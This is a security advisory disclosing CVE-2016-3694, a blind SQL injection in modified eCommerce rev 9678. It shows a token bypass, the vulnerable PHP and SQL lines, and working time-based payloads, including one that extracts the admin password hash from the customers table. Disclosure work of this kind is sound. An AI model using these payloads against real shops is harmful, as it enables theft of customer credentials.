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CVE-2016-3694 modified eCommerce Shopsoftware rev 9678 - Blind SQL Injection

From: Felix Maduakor <Felix.Maduakor () ruhr-uni-bochum de>
Date: Wed, 20 Apr 2016 19:42:26 +0200

# Title: Blind Injection modified eCommerce rev 9678
# Date: 16.04.2016
# Category: webapps
# Vendor Homepage: http://www.modified-shop.org/download
# Software Link: http://www.modified-shop.org/forum/index.php?action=downloads;sa=downfile&id=96
# Version: rev 9678
# Tested on: Apache/2.4.7, PHP Version 5.5.9, Linux
# Exploit Author: Felix Maduakor
# Contact: Felix.Maduakor () rub de
# CVE: CVE-2016-3694

Product Description:
modified eCommerce is an Open Source shopsoftware

Vulnerability Details:
Attackable are the GET-parameters 'orders_status' and 'customers_status' through 'easybillcsv.php':

File: [shoproot]/api/easybill/easybillcsv.php

[24] if (isset($_GET['token']) && $_GET['token'] == MODULE_EASYBILL_CSV_CRON_TOKEN) {
[25-61]         ...
[62]            } else {
[63] die('Direct Access to this location is not allowed.');

As default option the easybill-module is not installed and the constant MODULE_EASYBILL_CSV_CRON_TOKEN is not set. As long as the easybill-module is not installed, it is possible to bypass the restriction: [Shoproot]/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN

[35]            if (count($_GET['orders_status']) > 0) {
[36] $_GET['orders_status'] = preg_replace("'[\r\n\s]+'", '', $_GET['orders_status']);
[37]            $orders_status = explode(',', $_GET['orders_status']);
[38] $module->from_orders_status = implode("', '", $orders_status);
[39]            }

[43]            if (isset($_GET['customers_status'])) {
[44] $_GET['customers_status'] = preg_replace("'[\r\n\s]+'", '', $_GET['customers_status']); [45] $customers_status = explode(',', $_GET['customers_status']); [46] $module->from_customers_status = implode("', '", $customers_status);
[47]            }

As you can see in lines 35-39 and 43-47 the GET-parameters 'orders_status' and 'customers_status' are not escaped, but formatted (removed whitespaces, replaced commas with "', '"). They will be set as local variables of the "$module"-object.

File: [shoproot][admin-folder]/includes/modules/system/easybillcsv.php

[63]        $export_query = xtc_db_query("SELECT DISTINCT o.orders_id
[64]                                    FROM ".TABLE_ORDERS." o
[66]                                      ON o.orders_id = osh.orders_id
[67] WHERE (o.orders_status IN ('" . $this->from_orders_status . "') [68] OR osh.orders_status_id IN ('" . $this->from_orders_status . "')) [69] AND (o.last_modified >= '". date( "Y-m-d H:i:s", strtotime($this->from_order_date)) . "' [70] OR o.date_purchased >= '". date( "Y-m-d H:i:s", strtotime($this->from_order_date)) . "') [71] AND o.customers_status IN ('" . $this->from_customers_status . "')
[72]                                ORDER BY o.orders_id");

The unescaped GET-parameters get placed in the query on line 67, 68 and 71. Through the ORDER BY statement (with the explicit table-references) it is not possible to use a union-based injection.
The injection cannot include whitespaces or commas.

POC [Proof of Concept]:;))or-sleep(5)/*&customers_status=*/%23
Will result in following query and execute the sleep-function for 5 seconds:

                                   FROM ".TABLE_ORDERS." o
                                      ON o.orders_id = osh.orders_id
WHERE (o.orders_status IN ('-111'))or-sleep(5)/*

                                    long comment

                               ORDER BY o.orders_id

There are multiple ways to bypass the whitespace/comma-filter. A possible way to check if the first character of the admin-hash is '$' would be:;))or(Select(case(36)when(ascii(substring(`customers_password`FROM(1)FOR(1))))then-sleep(5)End)from`customers`where`customers_id`=1)/*&customers_status=*/%23

[16.04.2016] Reporting vulnerability to vendor

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